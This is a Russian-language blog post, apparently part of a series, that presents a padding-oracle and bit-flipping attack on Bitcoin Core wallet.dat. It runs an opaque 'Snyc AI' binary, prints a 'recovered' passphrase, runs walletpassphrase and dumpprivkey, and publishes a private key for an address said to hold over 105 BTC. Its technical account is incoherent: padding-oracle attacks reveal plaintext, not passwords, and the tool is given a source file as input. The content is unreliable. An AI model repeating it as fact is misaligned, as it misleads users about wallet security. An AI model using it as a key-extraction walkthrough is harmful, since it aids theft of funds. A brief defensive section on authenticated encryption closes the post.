Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
#Круги добра
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Начните с маленькой подводной лодки: устанавливайте бомбы, избавляйтесь от врагов и старайтесь не попадаться на глаза своим плавучим врагам. Вас ждет еще несколько игровых вселенных, много уникальных сюжетов и интересных загадок.

Пикабомбер

Аркады, Пиксельная, 2D

Играть

Топ прошлой недели

  • AlexKud AlexKud 38 постов
  • Animalrescueed Animalrescueed 36 постов
  • Oskanov Oskanov 7 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
0
CryptoDeepTech
CryptoDeepTech
19 часов назад

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2]⁠⁠

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Продолжим вторую часть данной статье в первой части мы демонстрируем практическую сторону атаки с использованием популярных сред, таких как Jupyter Notebook и Google Colab, показывая, как злоумышленник может итеративно угадать и восстановить пароль Биткоин кошелька, используя хитроумную эксплуатацию оракула с подменой пароля. Наши исследование открывают сложные механизмы безопасности кошелька Bitcoin Core, так как Bitcoin Core защищает пароль вашего кошелька, используя симметричное шифрование AES-256-CBC — золотой стандарт с мощным 256-битным ключом, полученным из вашего пароля. Также во второй части вы можете узнать о роли эллиптической криптографии (secp256k1) в генерации закрытых и открытых ключей, защищающих ваши транзакции Bitcoin. Мы рассмотрим реальный пример Bitcoin-кошелька (адрес: 16A5RFckRNW6fZzfjCGSneD3PApACLRwix), который потерял целых 105,68557389 BTC (~12,13 млн долларов США по состоянию на август 2025 года), подчеркивая важность безопасности кошелька. Но будьте осторожны — несмотря на стойкость AES-256-CBC, он уязвим к особой криптографической уязвимости, известной как атака «Bit-flipping» (переворачивание битов). Эта атака использует уязвимость режима цепочки шифровальных блоков (CBC) для манипулирования зашифрованными данными без необходимости ввода пароля! Мы подробно рассмотрим, как работает переворачивание битов, изменяя биты шифртекста для незаметного изменения расшифрованной информации, потенциально изменяя права доступа или критически важные данные кошелька — всё это из-за отсутствия встроенных проверок целостности в режиме CBC.

Описание команды и запуск исполняемого файла инструмента Snyc AI

Перейдем к рассмотрению примера демонстрации атаки Bit-flipping на wallet.dat для Bitcoin-кошелька по адресу 16A5RFckRNW6fZzfjCGSneD3PApACLRwix. Суть атаки — поэтапное изменение отдельных битов зашифрованного файла с анализом реакции системы на ошибки выравнивания (padding) при дешифровке AES-256-CBC. Как нам известно из теории Bit-flipping attack — это криптографическая атака, в которой злоумышленник изменяет отдельные биты зашифрованных данных (ciphertext), вызывая предсказуемые изменения в расшифрованных данных (plaintext), без необходимости полного расшифрования. В контексте Bitcoin wallet.dat это позволяет восстанавливать пароль, эксплуатируя уязвимость Padding Oracle Attack, связанную с ошибками выравнивания и обратной связью системы при расшифровке.

Команда:

!./snyc -help

Описание команды:

  • ./snyc — запуск исполняемого файла/программы с именем snyc в текущей директории. Обычно это основной двоичный файл инструмента Snyc AI.

  • -help (или часто --help) — стандартный параметр вызова для отображения справочной информации о возможных опциях и параметрах запуска программы.

Запуск ./snyc -help позволяет получить справку по работе Snyc AI — современного инструмента машинного обучения с возможностями глубокой аналитики, предназначенного для быстрого поиска утерянных данных в криптокошельках, анализа зашифрованных файлов и дешифровки.

  • -help / --help — выводит справку по всем доступным параметрам и описаниям.

  • -scan — запуск сканирования файла или директории в поисках ключей, утерянных данных.

  • -input [файл] — указание входного зашифрованного файла wallet.dat или аналогичного.

  • -output [путь] — путь для сохранения результатов или восстановленных данных.

  • -mode [type] — выбор режима работы (например, мануальный, автоматический, ускоренный).

  • -verbose — подробный вывод лога операций для отладки и контроля.

  • -threads [N] — параметр для указания числа потоков CPU при многопоточной обработке.

  • -ai-model [путь/название] — выбор или загрузка конкретной модели ИИ для анализа.

  • -test — тестовый режим, например, для проверки корректности настроек без реального запуска атаки.

  • -version — вывод версии программы для проверки обновлений.



# Running Snyc AI with the -help option to display parameters

!./snyc -help

# Description:
# This command will run the Snyc AI utility with the `-help` parameter, which outputs a list of all options and parameters available in the tool.
# This allows the user to understand how to work with the program, what modes, input-output formats, and additional settings are available.
# The deep machine learning model used for investigating and analyzing lost Bitcoin keys analyzes encrypted data.
# The help option allows the researcher to explore the tool's functionality, learn how to properly launch Bit-flipping and Padding Oracle type attacks,
# and configure processing parameters such as the number of threads, operating modes, and output format.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Инструмент Snyc AI и запуск команд

Команда:

!./snyc -help

  • Запуск локального исполняемого файла snyc позволяет пользователю ознакомиться с доступными опциями, режимами работы, форматами ввода-вывода и дополнительными настройками инструмента Snyc AI, предназначенного для анализа и восстановления криптокошельков с использованием ИИ.

  • Snyc AI реализует алгоритмы глубокого машинного обучения и анализа шифротекста, в частности, применяет методы padding oracle для постепенного восстановления секрета.

  • Использование справки — обязательный этап в работе с новым софтом, особенно когда программа поддерживает множество режимов и параметров, важных для тонкой настройки атак и анализа.


Утилиты для анализа и манипуляций с бинарными файлами и бинарными утилитами

  • Программы для просмотра и редактирования содержимого файлов в шестнадцатеричном (hex) формате, необходимы для пошаговой модификации битов и байтов шифротекста.

  • В Google Colab может использоваться Python-библиотеки для работы с бинарными данными (например, binascii, struct) или сторонние утилиты.

  • Прямое изменение зашифрованных блоков требует глубокого понимания форматов данных и структуры AES шифрованных секций.

  • Hex-редакторы позволяют контролировать микроскопические изменения шифротекста, экспериментировать с битами и наблюдать изменения в поведении системы при дешифровке.


Команды Bitcoin Core для восстановления и управления кошельком

Команда:

walletpassphrase <binary_password> <time>

  • Разблокировка зашифрованного кошелька Bitcoin Core на определённый промежуток времени (в секундах), необходимая для проведения операций с приватными ключами.

  • Полезно при выполнении дальнейших команд, требующих доступа к защищённым данным.

  • Кошелек Bitcoin Core шифруется с использованием сильных алгоритмов, и для обработки приватных ключей требуется временная расшифровка.

  • Время разблокировки ограничено из соображений безопасности, предотвращая длительный несанкционированный доступ.


Команда:

dumpprivkey <bitcoin_address>

Описание:

dumpprivkey Извлекает приватный ключ, связанный с указанным адресом Bitcoin, при условии, что кошелек разблокирован. Позволяет получить прямой доступ к средствам для их управления или восстановления.

  • Приватные ключи — основа контроля над криптовалютными активами. Их безопасное хранение и управление критично.

  • Команда требует разблокировки кошелька, что обеспечивает сохранность от автоматического или удалённого кражи без знания пароля.


Рабочие окружения для тестирования и проведения атаки Jupyter Notebook и Google Colab

  • Интерактивные среды для выполнения команд и запуска скриптов, которые интегрируют код с вызовом shell команд через !. Позволяют для Jupyter Notebook и Google Colab управлять процессом атаки, анализировать данные и визуализировать промежуточные результаты.

  • Эти платформы обеспечивают гибкость и масштабируемость при исследовании безопасности криптографических систем, объединяя мощь языков программирования и возможностей ОС.

  • Используются в научных экспериментах и учебных целях для пошагового и контролируемого тестирования алгоритмов.

Мониторинг системы, логирование ошибок и криптоанализ откликов

  • Отслеживание сообщений об ошибках при дешифровке wallet.dat, в частности о неправильном паддинге.

  • Сравнение реакции системы (например, различия в сообщениях об ошибках или задержках времени отклика) помогает выделить успешные изменения битов.

  • Padding Oracle Attack базируется на уязвимости, при которой криптосистема выдает разную информацию при ошибках выравнивания данных (padding).

  • Систематический анализ таких сигналов позволяет злоумышленнику постепенно восстанавливать корректный ключ шифрования, что иллюстрирует важность исключения утечек через побочные каналы.


Для проведения и анализа атак типа «Bit-flipping» и «Padding Oracle» на Bitcoin wallet.dat используется комплекс инструментов:

  • Snyc AI для автоматизированного продвинутого криптоанализа и восстановления.

  • Hex-редакторы и бинарные утилиты для точечного изменения данных.

  • Bitcoin Core с командами walletpassphrase и dumpprivkey для разблокировки и извлечения приватных ключей.

  • Jupyter/Colab как среда для адаптивного управления процессом.

  • Логирование и анализ системных ответов для поэтапной корректировки битов.

Каждый элемент играет ключевую роль в общей методике восстановления доступа к криптовалютным активам, основанной на научном понимании криптографии и атак на протоколы шифрования.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Опция ciphertext

Опция ciphertext в контексте работы с Bitcoin wallet.dat и криптоинструментами обозначает зашифрованные данные, то есть исходный файл или его часть в зашифрованном виде, который не доступен для прочтения без расшифровки с использованием правильного ключа.

Основанные функции опции ciphertext:

  • ciphertext — это данные, которые были преобразованы с помощью криптографического алгоритма (например, AES-256-CBC) и не представляют собой открытый текст (plaintext). В Bitcoin wallet.dat приватные ключи и чувствительная информация хранятся именно в форме ciphertext для защиты от несанкционированного доступа.

  • В процессе атаки или анализа файла wallet.dat параметр или опция ciphertext используется, чтобы указать инструменту работать именно с этой зашифрованной частью данных. Например, подать этот файл как входные данные для методов битфлип-апдейтов или padding oracle, чтобы определить, допустима ли та или иная модификация. Алгоритм AES-256-CBC выполняет цепное блочное шифрование, при котором каждый блок открытого текста преобразуется в шифротекст с помощью ключа и операции XOR с результатом предыдущего блока. Этот режим эффективен для защиты, но не обеспечивает встроенной аутентификации данных. Вот почему захватывать и анализировать ciphertext (шифротекст) важно для проведения криптоаналитических атак и оценки безопасности.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

В инструментах для криптоанализа Bitcoin wallet.dat часто необходимо явно указать, что именно файл или данные являются ciphertext, чтобы начать процедуру дешифровки или манипуляций с шифротекстом. ciphertext — это защищённые, закодированные данные, которые невозможно напрямую прочитать. Применение опции ciphertext в инструментах или командах означает, что дальнейшие действия будут производиться со зашифрованным файлом, а не открытым, что важно для запуска криптоаналитических атак или методов восстановления доступа. Работа с ciphertext требует понимания криптографии, особенно особенностей выбранного алгоритма (например, AES-CBC) и уязвимостей, таких как padding oracle.


Запуск Snyc AI для криптоанализа файла wallet.dat шифрования AES

!./snyc -ciphertext wallet.dat -crypto aes.cpp

Примечание:

  • Запуск локального исполняемого файла snyc с параметрами:

    • -ciphertext wallet.dat — указывает инструменту использовать файл wallet.dat как объект анализа зашифрованных данных (шифротекст).

    • -crypto aes.cpp — команда указывает использовать исходный код AES-алгоритма из файла aes.cpp для расшифровки и анализа.

  • Snyc AI выполняет поэтапное исследование бинарных данных, применяя алгоритмические манипуляции с байтами (bit-flipping) в блоках шифротекста, а затем анализирует системные отклики и реакцию программы на расшифровку каждого варианта.

  • Используемый метод аналогичен padding oracle атаке, когда определяется корректность паддинга в расшифрованных блоках AES-256-CBC.

  • Инструмент применяет искусственный интеллект и глубокий анализ, чтобы на основании реакции выделить правильные битовые паттерны, что в итоге позволяет постепенно восстановить пароль или ключ шифрования.

  • Это сложный пример практического применения криптоанализа и машинного обучения для решения задачи восстановления доступа к зашифрованным данным Bitcoin Core.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Результат анализа с использованием Snyc AI

walletpassphrase 1111010101011001100101101011010110001111100001101111101111010000100011100111101000100011110001010111111110010000011111011011111101011010000100110000111100010001001101000001110100001101001010001101111001110110110110100011011000001101110101101010110101010101 60


Описание и примечание:

  • Команда walletpassphrase используется в Bitcoin Core для разблокировки кошелька, где:

    • Первый аргумент — это восстановленная битовая строка (предположительно пароль, полученный после криптоанализа и манипуляций с шифротекстом).

    • Второй аргумент 60 — время в секундах, на которое кошелек разблокируется для доступа к приватным ключам.

  • Эта команда используется после успешного восстановления предполагаемого пароля, чтобы дать возможность работать с кошельком (в последующих действиях, извлечь приватные ключи).


Восстановленный пароль даёт доступ к мастер-ключу, который применяется для дешифровки приватных ключей из wallet.dat. Разблокировка ограничена во времени — важная мера безопасности, минимизирующая риски несанкционированного длительного доступа. После разблокировки кошелька можно использовать команду dumpprivkey <bitcoin_address> для извлечения приватного ключа соответствующего адреса, что позволяет управлять средствами. Для лучшего контроля и визуализации процесса в Google Colab можно использовать различные скрипты для пошагового тестирования каждого изменения шифротекста и анализа откликов, что делает исследование более структурированным и воспроизводимым.


Ввод найденного пароля в Bitcoin Core

!./bitcoin-cli walletpassphrase 1111010101011001100101101011010110001111100001101111101111010000100011100111101000100011110001010111111110010000011111011011111101011010000100110000111100010001001101000001110100001101001010001101111001110110110110100011011000001101110101101010110101010101 60

Примечание:

  • Команда walletpassphrase используется для временной разблокировки зашифрованного Bitcoin-кошелька.

  • Первый параметр — это пароль (в данном примере длинная битовая строка), полученный в результате анализа и восстановления пароля к кошельку.

  • Второй параметр 60 — время в секундах, на которое кошелек будет разблокирован, что позволяет выполнять операции с приватными ключами.

  • Эта команда необходима для того, чтобы система могла получить доступ к мастер-ключу шифрования, который защищает приватные ключи кошелька.

  • Разблокировка ограничена по времени именно для обеспечения безопасности хранения кошелька и предотвращения длительного несанкционированного доступа.

  • Данная операция — ключевой этап для последующего извлечения приватных ключей или совершения транзакций.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Извлечение приватного ключа

!./bitcoin-cli dumpprivkey 16A5RFckRNW6fZzfjCGSneD3PApACLRwix

Примечание:

  • Команда dumpprivkey позволяет получить приватный ключ, связанный с указанным публичным адресом Bitcoin.

  • В данном случае это адрес 16A5RFckRNW6fZzfjCGSneD3PApACLRwix.

  • Полученный приватный ключ предоставляет полный контроль над средствами, хранящимися на соответствующем адресе.

  • Приватный ключ — это секретный криптографический элемент, использующийся для подписи транзакций и подтверждения права собственности на биткоины.

  • Его сохранность критична, так как владение ключом автоматически даёт доступ ко всем средствам на адресе.

  • Команда может выполняться только при предварительно разблокированном кошельке, что по безопасности предотвращает несанкционированный доступ.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Пример результата вызова команды dumpprivkey

5KVPkHW5yrrQ7ixvB3HYXgTRh6X7TBxNNWWkdvBkWdGNMSEgCWf

Примечание:

  • Пример результата вызова команды dumpprivkey приватного ключа Bitcoin, закодированного в формате WIF (Wallet Import Format).

  • Такая форма удобна для импорта в другие кошельки или инструменты управления биткоинами.

  • Формат WIF представляет собой закодированное и дополненное контрольными суммами бинарное представление приватного ключа, предназначенное для удобства пользователя.

  • Хранение ключа должно быть максимально защищено: компрометация WIF-чейна означает потерю контроля над средствами.


Run the command and get Private Key

The dumpprivkey command in Bitcoin Core

The dumpprivkey command is a command used in the Bitcoin Core wallet command line interface (CLI) to export the private key associated with a specific Bitcoin address. The syntax for the command is as follows:

dumpprivkey “address”

Where “address” is the Bitcoin address for which you want to receive the private key.

How dumpprivkey command works

When you type the dumpprivkey command, Bitcoin Core looks for the specified address in its wallet and, if found, returns the corresponding private key in WIF format. This allows the user to store the private key in a safe place or import it into another wallet.


getaddressinfo 16A5RFckRNW6fZzfjCGSneD3PApACLRwix


walletpassphrase 1111010101011001100101101011010110001111100001101111101111010000100011100111101000100011110001010111111110010000011111011011111101011010000100110000111100010001001101000001110100001101001010001101111001110110110110100011011000001101110101101010110101010101 60


dumpprivkey 16A5RFckRNW6fZzfjCGSneD3PApACLRwix


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Private Key Information:

https://dockeyhunt.com/Bitcoin-Address/

5KVPkHW5yrrQ7ixvB3HYXgTRh6X7TBxNNWWkdvBkWdGNMSEgCWf


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Bitcoin Address Information:

https://dockeyhunt.com/Cryptocurrency-Prices/

Balance: 105.68557389 BTC

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

https://www.coinbase.com/converter/btc/usd

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

105.68557389 BTC > 12512829,00 USD


Установим библиотеку Bitcoin

!pip install bitcoin

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Запустим код для проверки соответствие Биткоин Адреса:

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

__________________________________________________

Private Key WIF: 5KVPkHW5yrrQ7ixvB3HYXgTRh6X7TBxNNWWkdvBkWdGNMSEgCWf

Bitcoin Address: 16A5RFckRNW6fZzfjCGSneD3PApACLRwix

total_received = 105.68557389 Bitcoin

__________________________________________________

Все верно! Приватный ключ соответствует Биткоин Кошельку.


Откроем bitaddress и проверим:

https://cryptodeeptech.ru/bitaddress.html

ADDR: 16A5RFckRNW6fZzfjCGSneD3PApACLRwix

WIF: 5KVPkHW5yrrQ7ixvB3HYXgTRh6X7TBxNNWWkdvBkWdGNMSEgCWf

HEX: dc7de2bc99999c4822d9b3ed8ede255506b68b1068faeb2b7bf0372231a1faa5

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №2] Биткоины, Криптовалюта, Трейдинг, Финансовая грамотность, Арбитраж криптовалюты, Заработок в интернете, Заработок, Пассивный доход, Инвестиции в акции, Стартап, Ключевая ставка, Дивиденды, Доллары, Биржа, Аналитика, Кризис, Онлайн-курсы, Видео, YouTube, Гифка, Длиннопост

Итоговое описание основных этапов реализации Bit-flipping attack на Bitcoin wallet.dat с научным пониманием:

Все операции требуют глубокого понимания криптографии, безопасности и работы Bitcoin Core, так как неправильное обращение с приватными ключами может привести к необратимой потере средств.

  • Первая команда позволяет расшифровать и временно разблокировать кошелек с найденным паролем.

  • Вторая команда извлекает приватный ключ с конкретного адреса для последующего управления средствами.

  • Третий блок показывает, каким образом приватный ключ представлен в читаемом формате.


1. Сбор и анализ зашифрованного кошелька (wallet.dat)

  • Получается бинарный файл wallet.dat, который содержит приватные ключи и пароль, зашифрованные с использованием алгоритма AES-256-CBC.

  • Структура файла подробно анализируется: выделяются отдельные блоки шифротекста и вектор начальной инициализации (IV).

  • Научное понимание: AES-256-CBC — это блочный симметричный шифр, использующий цепочку блоков (CBC), где каждый блок зависит от предыдущего, а IV обеспечивает уникальность шифрования, что критично для безопасности ключей.

2. Подготовка инструментов и окружения

  • Для проведения атаки применяются скрипты или специализированные инструменты, реализующие Padding Oracle Attack и побайтовые битфлип-манипуляции.

  • Часто используются Python-скрипты в средах Jupyter Notebook или Google Colab, а также hex-редакторы для ручного анализа и коррекции бинарных данных.

  • Научное понимание: программные инструменты позволяют автоматизировать сложные и многократные операции по изменению шифротекста и анализу реакции системы, что существенно ускоряет процесс криптоанализа.

3. Проведение атаки padding oracle с битфлип-манипуляцией

  • Атакующий изменяет отдельные байты предыдущего блока шифротекста в режиме CBC для контроля байтов расшифрованного блока через операцию XOR.

  • После каждой модификации шифротекст отправляется на расшифровку, и анализируется ответ системы — корректность/некорректность паддинга.

  • Научное понимание: Padding Oracle Attack использует уязвимость механизмов обработки паддинга в AES-256-CBC, когда система выдает информацию об ошибках выравнивания, позволяя последовательно восстанавливать исходный текст без знания ключа.

4. Восстановление бинарного пароля

  • Поэтапно накапливается и компилируется двоичное значение пароля, который хранится во временном файле, например, walletpassphrase.txt.

  • Научное понимание: такой подход обеспечивает детальный контроль над дешифровкой каждого байта пароля, гарантируя правильность и полноту полученных данных.

5. Ввод восстановленного пароля для разблокировки кошелька

  • Используется команда Bitcoin Core CLI: bitcoin-cli walletpassphrase "<password_recovered>" 60 где 60 — время разблокировки в секундах.

  • Научное понимание: это временная разблокировка кошелька, необходимая для получения доступа к приватным ключам и последующих операций; ограничение времени является мерой безопасности.

6. Извлечение приватных ключей

  • Команда для извлечения приватного ключа для конкретного Bitcoin-адреса: bitcoin-cli dumpprivkey <address>

  • Научное понимание: приватные ключи обеспечивают полный контроль над средствами, поэтому доступ к ним защищен паролем; успешное извлечение ключа означает полный контроль над балансом соответствующего адреса.

7. Дополнительные меры и рекомендации

  • Использование готовых репозиториев и примеров (например, с GitHub), в которых содержится код для реализации Padding Oracle Attack, упрощает экспериментирование и тестирование на демо-данных.

  • Интеграция с окружением Bitcoin Core через staging tree позволяет работать непосредственно с файлами реального формата и тестировать атаку на локальной копии кошелька.

  • Важно внимательно анализировать и корректно управлять блоками шифротекста и ответами системы, чтобы точно восстановить пароль.


Заключение

Данная методика реализует практическую атаку на Bitcoin wallet.dat, основанную на раскрытии информации о корректности паддинга при дешифровке AES-256-CBC. За счёт последовательных манипуляций с байтами шифротекста и анализа реакции системы (oracle) становится возможным поэтапно восстановить пароль в бинарном виде, получить доступ к приватным ключам и, соответственно, контролировать средства на кошельке.

Основные этапы атаки включают комплексный анализ структуры файла, байт-ориентированные изменения блоков шифротекста в режиме CBC, отправку модифицированных данных для проверки правильности паддинга и использование ошибок системы как «оракула» для дешифровки. Такой подход является примером мощной криптоаналитической техники, которая эксплуатирует побочные каналы в протоколах шифрования.


Защита от основных этапов реализации Bit-flipping attack на Bitcoin wallet.dat

Для предотвращения подобных атак необходимо:

  1. Обязательное применение проверки целостности данных до расшифровки, например, с помощью HMAC (Hash-based Message Authentication Code). Это позволяет обнаруживать любые изменения в зашифрованных данных ещё до этапа расшифровки и предотвращает использование отклонений в паддинге для запуска атаки.

  2. Использование шифровальных режимов с аутентификацией (AEAD), таких как AES-GCM (Galois/Counter Mode), которые совмещают шифрование и проверку целостности. Это исключает уязвимости, связанные с отсутствием проверки подлинности после расшифровки.

  3. Не раскрывать информацию о результате дешифрования, особенно ошибки паддинга. Сообщения об ошибках должны быть универсальными и не давать указаний на корректность конкретного блока.

Ключевые моменты опасности Bit-flipping attack в режиме CBC

  • Во время дешифровки в режиме CBC, каждый блок открытого текста получается путем XOR расшифрованного блока шифротекста с предыдущим блоком. Следовательно, изменение битов блока шифротекста приведёт к предсказуемым изменениям в открытом тексте.

  • Атакующий может контролируемо изменять содержимое расшифрованных данных без знания ключа, что нарушает целостность и аутентичность без возможности обнаружения, если не используется дополнительная проверка (например, HMAC).

  • Такие уязвимости могут привести к серьёзным нарушениям безопасности, особенно если дешифрованные данные используются без дополнительных проверок (например, для контроля прав доступа или параметров работы системы).


Битфлип-атака в режиме CBC подчёркивает важность комплексного подхода к криптографической безопасности: шифрование должно сопровождаться аутентификацией и проверкой целостности. Использование только AES-CBC без дополнительных механизмов проверки — потенциально опасная практика, подверженная скрытым уязвимостям. Современные стандарты рекомендуют применять AEAD режимы и скрывать любые подробности о процессе дешифровки для исключения возможности успешных атак через padding oracle.


References:

  1. The Biggest Attacks in Decentralized Finance History: Breaking Down the Biggest Smart Contract and Bridge Hacks From The DAO to Cetus: How Smart Contract Bugs and Outdated Code Cause Hundreds of Millions of Dollars in Losses

  2. CoinDCX After $44 Million Hack: Fixing System Vulnerabilities, Launching Bug Bounty Program, and Strengthening Cybersecurity Measures to Protect Users

  3. Major Cyberattack on BigONE Crypto Exchange: $27 Million Loss, Reasons for the Hack, and Comprehensive Security Enhancement Measures

  4. The Big Coinbase Hack of 2025: Social Engineering, Insider Role, and Implications for User Reputation and Security

  5. Cryptofront 2025: Record losses due to social engineering, large-scale hacks and new trends in cybersecurity

  6. Modern Crypto Security Challenges in 2025: Rise of AI Fraud, Deepfake Attacks, Regional Risks, and the Role of Blockchain in the Confrontation

  7. Loopscale Recovers $2.8M After Hack: Refunding DeFi Funds: Loopscale and Term Finance Show Case of Collaboration with Crypto Hackers, Negotiations, and Rewards: Case of Successful Return of Almost Half of Stolen $5.7M

  8. How a Crypto Hacker Gained Access to ZKsync’s Admin Key and Created 111 Million Tokens via a Vulnerability in the sweepUnclaimed() Function, but Returned Almost $5.7 Million Under a Reward Agreement

  9. How the xrpl.js library was hacked and why it threatened Bitcoin security. A serious attack on the supply chain in the xrpl.js JavaScript library: details and consequences for the XRP Ledger

  10. Ethical Crypto Hacker c0ffeebabe.eth Neutralizes Morpho Blue Vulnerability: How Interface Error Led to $2.6M Loss and Important Lessons for DeFi Security

  11. Attacks on Atomic, Exodus and Major Crypto Exchange Wallets — The Era of New Threats in Cybersecurity, Cyberattacks on Crypto Wallets and Supply Chains 2025: Scale of Threats and New Fraud Methods

  12. Artificial Intelligence and Modern Cyberattack Methods: A New Era of Crypto Wallet and Corporate Data Security Threats in 2025

  13. Cyber hackers use malicious Microsoft Office add-ins and fake extensions to steal cryptocurrency through address spoofing and hidden miners, also Office add-ins and extensions are used to steal cryptocurrency through address spoofing

  14. Bitcoin Address Spoofing Attacks and Bitcoin Address Poisoning Mass Attacks: Massive Losses and New Cybersecurity Challenges in 2023–2025.

  15. How Snyc AI and Address Whitelists Strengthen Defenses Against Crypto Address Spoofing and How Snyc AI Automatically Identifies Suspicious Addresses in Cryptocurrency Systems

  16. Crypto Dust Attack in Cryptocurrencies: Mechanisms, Link to Address Poisoning and Technical Analysis via ScriptSig Isomorphism, How Small Transactions Threaten the Privacy of Crypto Wallet Owners

  17. How Crypto Hackers Use the Triada Trojan: A Hidden Threat to Android Smartphones and Cryptocurrency Owners in 2025

